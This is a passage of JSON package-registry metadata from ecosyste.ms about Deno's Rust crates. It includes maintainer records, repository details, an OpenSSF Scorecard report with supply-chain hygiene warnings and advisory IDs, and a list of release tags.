{"login":"dsherret","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_timers/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_timers/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_timers/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_timers/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_timers/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_timers/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-07T18:29:34.425Z","updated_at":"2022-11-07T18:29:34.425Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:24.062Z","updated_at":"2023-07-18T22:41:24.062Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":4047586,"name":"deno_url","ecosystem":"cargo","description":"DEPRECATED: use deno_web instead","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":225,"first_release_published_at":"2021-03-12T20:56:32.388Z","latest_release_published_at":"2025-11-04T09:35:12.416Z","latest_release_number":"0.222.0","last_synced_at":"2026-08-31T22:41:20.968Z","created_at":"2022-04-12T10:01:42.871Z","updated_at":"2026-09-01T17:39:26.094Z","registry_url":"https://crates.io/crates/deno_url/","install_command":"cargo install deno_url","documentation_url":"https://docs.rs/deno_url/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-29T19:17:00.000Z","size":248743,"stargazers_count":108340,"open_issues_count":1540,"forks_count":6359,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-29T21:56:41.390Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-29T20:05:41.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36975782,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.0